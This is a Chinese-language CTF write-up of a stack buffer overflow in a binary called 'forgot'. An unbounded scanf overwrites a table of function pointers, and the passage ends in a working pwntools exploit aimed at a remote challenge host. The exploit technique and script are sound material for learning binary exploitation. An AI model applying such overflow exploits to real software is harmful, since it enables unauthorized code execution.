简化版代码如下
int __cdecl main(){ int v0; // ebx char email_check[32]; // [esp+10h] [ebp-74h] int(*v3)(); // [esp+30h] [ebp-54h] int (*v4)(); // [esp+34h] [ebp-50h] int (*v5)(); // [esp+38h] [ebp-4Ch] int (*v6)(); // [esp+3Ch] [ebp-48h] int (*v7)(); // [esp+40h] [ebp-44h] int (*v8)(); // [esp+44h] [ebp-40h] int (*v9)(); // [esp+48h] [ebp-3Ch] int (*v10)(); // [esp+4Ch] [ebp-38h] int (*v11)(); // [esp+50h] [ebp-34h] int (*v12)(); // [esp+54h] [ebp-30h] char s; // [esp+58h] [ebp-2Ch] int Index; // [esp+78h] [ebp-Ch] int i; // [esp+7Ch] [ebp-8h] Index = 1; v3 = fun0; v4 = fun1; v5 = fun2; v6 = fun3; v7 = fun4; v8 = fun5; v9 = fun6; v10 = fun7; v11 = fun8; v12 = fun9; puts("What is your name?"); printf("> "); fflush(stdout); fgets(&s, 32, stdin); sub_80485DD((int)&s); fflush(stdout); printf("I should give you a pointer perhaps. Here: %x\n\n", fun4); fflush(stdout); puts("Enter the string to be validate"); printf("> "); fflush(stdout); __isoc99_scanf("%s", email_check); for ( i = 0; ; ++i ) { v0 = i; if ( v0 >= strlen(email_check) ) break; switch ( Index ) { case 1: if ( sub_8048702(email_check[i]) ) // a-z,0-9,+,-,.,/ =>first char Index = 2; break; case 2: if ( email_check[i] == '@' ) Index = 3; break; case 3: if ( sub_804874C(email_check[i]) ) // a-z,0-9,_ Index = 4; break; case 4: if ( email_check[i] == '.' ) Index = 5; break; case 5: if ( sub_8048784(email_check[i]) ) // a-z Index = 6; break; case 6: if ( sub_8048784(email_check[i]) ) // a-z Index = 7; break; case 7: if ( sub_8048784(email_check[i]) ) // a-z Index = 8; break; case 8: if ( sub_8048784(email_check[i]) ) // a-z Index = 9; break; case 9: Index = 10; break; default: continue; } } ((void (*)(void))*(&v3 + --Index))(); // fun[Index--] return fflush(stdout);}
分析源码:可以控制调用函数的下标,即从fun0-fun9中调用,而接下来的输入点可以覆盖掉fun函数列表,于是其中一种思路是:用字符过滤的原则只让Index一开始为2,之后调用fun1,而对应的将fun1的地址覆盖为可疑函数的地址。细节:&&和||,&&优先级高,实现字符过滤 __isoc99_scanf("%s", email_check);不限长输入,在email_check下有函数的地址列表。可疑函数地址:0x080486CC。偏移量(OX74-0x54)此时为anonymous(fun0)以上的偏移,之后再加上fun0对应的4字节,即为0x24,在把fun1覆盖,这里选择覆盖fun1的原因是与输入的'a'有关,符合输入字符,最会把Index变为2,之后再--Index.payload
__isoc99_scanf("%s", email_check);
payload
from pwn import *context.log_level = 'debug'p = remote("220.249.52.133",48040)#p = process('./forgot')payload = 'a'*0x24+p32(0x080486CC) p.recvuntil("> ")p.sendline('a')p.recvuntil("> ")p.sendline(payload)p.interactive()
效果:
京公网安备 11010802041100号